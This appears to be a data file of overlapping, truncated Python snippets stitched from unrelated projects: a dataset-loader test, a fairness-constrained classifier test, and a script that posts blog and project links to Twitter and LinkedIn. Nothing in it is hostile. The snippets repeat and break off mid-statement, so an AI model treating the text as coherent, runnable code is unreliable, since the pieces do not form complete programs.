import rep_vict def test_rep_vict(): \"\"\"Test", "\"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8,", "columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape ==", "x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except: shutil.rmtree(test_path) raise()", "module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has 8", "observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing", "sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by", "data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata", "extracted data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train,", "from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and", "import division from __future__ import print_function import shutil import sys import tempfile from", "of extracted data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp()" ]
[ "validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data", "= ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i", "lf # loss funcs that can be optimized subject to various constraints NUM_FOLDS", "between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint,", "print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now", "apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr =", "optimized subject to various constraints NUM_FOLDS = 10 # we will show 10-fold", "compute the p-rule in the original data \"\"\" Classify the data without any", "as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair", "ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in", "['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\"", "accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\"", "linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS,", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print", "['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained 
(original) classifier ==\"", "the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint,", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print", "p-rule in the original data \"\"\" Classify the data without any constraints \"\"\"", "apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained", "correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy", "ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\" Classify the", "before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X,", "generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in", "print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])", "10 # we will show 10-fold cross validation accuracy as a performance measure", "test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints,", "data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule", "Constrained (fair) 
classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff", "ut.add_intercept(X) # add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr,", "in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\")", "apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) #", "test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"],", "x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data", "train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint,", "classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve", "plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS,", "(fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between", "X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the", "as lf # loss funcs that can be optimized subject to various constraints", "lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying the linear", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in 
range(0,NUM_FOLDS)])", "Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control,", "fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])", "cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{}", "(original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we", "y) # compute the p-rule in the original data \"\"\" Classify the data", "the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute", "classification is in this directory import utils as ut import loss_funcs as lf", "any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function", "cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor}", "classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor =", "= 10 # we will show 10-fold cross validation accuracy as a performance", "\"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1", "synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the", "import os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') #", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): 
test_synthetic_data() if __name__ == '__main__':", "achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr,", "= 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X", "in this directory import utils as ut import loss_funcs as lf # loss", "applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y,", "\"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr", "= ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i", "import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this", "the code for fair classification is in this directory import utils as ut", "0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function,", "utils as ut import loss_funcs as lf # loss funcs that can be", "# loss funcs that can be optimized subject to various constraints NUM_FOLDS =", "correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint,", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print", "data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint", "sys.path.insert(0, 
'../../fair_classification/') # the code for fair classification is in this directory import", "directory import utils as ut import loss_funcs as lf # loss funcs that", "Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor", "intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr,", "funcs that can be optimized subject to various constraints NUM_FOLDS = 10 #", "= 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X,", "# add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr,", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"==", "in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\")", "add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr,", "show 10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate", "sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier", "the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control,", "cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\"", "code for fair classification is in this directory import utils as ut import", "as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X,", 
"Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0", "the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint", "from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is", "range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\"", "\"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y)", "# the code for fair classification is in this directory import utils as", "ut import loss_funcs as lf # loss funcs that can be optimized subject", "apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X", "accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main():", "import loss_funcs as lf # loss funcs that can be optimized subject to", "ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness", "performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control", "\"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in", "the original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints =", "10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the", "y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original", "a tradeoff 
between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function,", "measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control =", "\"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data()", "= ut.add_intercept(X) # add intercept to X before applying the linear classifier test_acc_arr,", "such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0", "perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr,", "classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function,", "range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\"", "can be optimized subject to various constraints NUM_FOLDS = 10 # we will", "i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr,", "that can be optimized subject to various constraints NUM_FOLDS = 10 # we", "= 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X =", "generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\" Classify", "sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if 
__name__", "in the original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints", "<reponame>yashwarlord/fairness-comparison import os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/')", "i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr,", "subject to various constraints NUM_FOLDS = 10 # we will show 10-fold cross", "cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control,", "0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before", "apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair)", "\"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints =", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ == '__main__': main()", "[{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr,", "= 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS,", "ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ ==", "constraints NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as", "without any 
constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0", "the p-rule in the original data \"\"\" Classify the data without any constraints", "loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying", "correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'],", "import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code", "various constraints NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy", "apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained", "* sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory", "loss funcs that can be optimized subject to various constraints NUM_FOLDS = 10", "original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0", "that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr,", "==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect", "be optimized subject to various constraints NUM_FOLDS = 10 # we will show", "fair classification is in this directory import utils as ut import loss_funcs as", "= generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\"", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"==", "print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, 
correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify", "NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a", "a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y,", "to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr", "\"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such", "for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr,", "= 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add", "loss_funcs as lf # loss funcs that can be optimized subject to various", "classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the", "cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic", "= lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying the", "Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) #", "data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint =", "os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the", "correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\"", "# compute the p-rule in the original data \"\"\" Classify the data without", "will show 10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\"", "import utils as ut import loss_funcs 
as lf # loss funcs that can", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print", "this directory import utils as ut import loss_funcs as lf # loss funcs", "to various constraints NUM_FOLDS = 10 # we will show 10-fold cross validation", "is in this directory import utils as ut import loss_funcs as lf #", "np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification", "==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness", "X = ut.add_intercept(X) # add intercept to X before applying the linear classifier", "tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints,", "constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function =", "\"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y,", "for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr,", "numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for", "[{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr,", "Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that", "for fair classification is in this directory import utils as ut import loss_funcs", "cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, 
apply_accuracy_constraint, sep_constraint, ['s1'], [{} for", "# we will show 10-fold cross validation accuracy as a performance measure def", "cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for", "and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def", "ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in", "\"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X,", "0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept", "cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints", "sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier", "0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X)", "def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False)", "'../../fair_classification/') # the code for fair classification is in this directory import utils", "X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr =", "ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if", "fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, 
correlation_dict_train_arr, cov_dict_test_arr,", "1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y,", "apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original)", "we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr,", "as ut import loss_funcs as lf # loss funcs that can be optimized", "\"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint =", "we will show 10-fold cross validation accuracy as a performance measure def test_synthetic_data():", "\"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss", "\"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a", "print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot" ]
[ "BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to", "message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self):", "Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message =", "tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet +", "is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check", "from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}.", "blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except:", "+ ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + '", "Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\")", "Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try:", "oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in", "#reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self):", "import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it", "' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo:", "ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts'", "{url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. 
Check it out! {url} #reviveposts' def", "except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except:", "'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog", ".opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin", "= BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting", "= 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE =", "def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message)", "' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'],", "from .opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from", "out! 
{url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'],", "Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\")", "pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass", "#{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url']", "tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet =", "tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet +", "if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error", "it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url}", "posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'],", "+ ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + '", "it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format(", "try: if 'documentation' in random_project: tweet = tweet + ' Docs: 